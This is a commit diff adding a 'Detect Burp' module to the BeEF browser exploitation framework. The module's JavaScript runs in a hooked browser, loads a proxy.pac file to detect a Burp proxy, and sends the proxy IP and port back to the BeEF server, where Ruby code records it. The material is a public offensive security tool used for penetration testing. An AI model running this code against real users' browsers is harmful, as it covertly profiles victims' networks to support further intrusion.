Add Detect Burp module

modules/network/detect_burp/command.js

@@ -0,0 +1,33 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  load_script = function(url) {
+    var s = document.createElement("script");
+    s.type = 'text/javascript';
+    s.src  = url;
+    document.body.appendChild(s);
+  }
+
+  get_proxy = function() {
+    try {
+      var response = FindProxyForURL('', '');
+      beef.debug("Response: " + response);
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,
+        "has_burp=true&response=" + response
+      );
+    } catch(e) {
+      beef.debug("Response: " + e.message);
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_burp=false");
+    }
+  }
+
+  load_script("http://burp/proxy.pac");
+  setTimeout("get_proxy()", 10000);
+
+});
+

modules/network/detect_burp/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_burp:
+            enable: true
+            category: "Network"
+            name: "Detect Burp"
+            description: "This module checks if the browser is using Burp. The Burp web interface must be enabled (default). The proxy IP address is returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/network/detect_burp/module.rb

@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_burp < BeEF::Core::Command
+
+  def post_execute
+    save({'result' => @datastore['result']})
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+      if @datastore['results'] =~ /^has_burp=true&response=PROXY ([\d\.]+:[\d]+)/
+        ip = $1.split(':')[0]
+        port = $1.split(':')[1]
+        session_id = @datastore['beefhook']
+        if BeEF::Filters.is_valid_ip?(ip)
+          print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
+          BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'Burp Proxy')
+        end
+      end
+    end
+  end
+
+end
+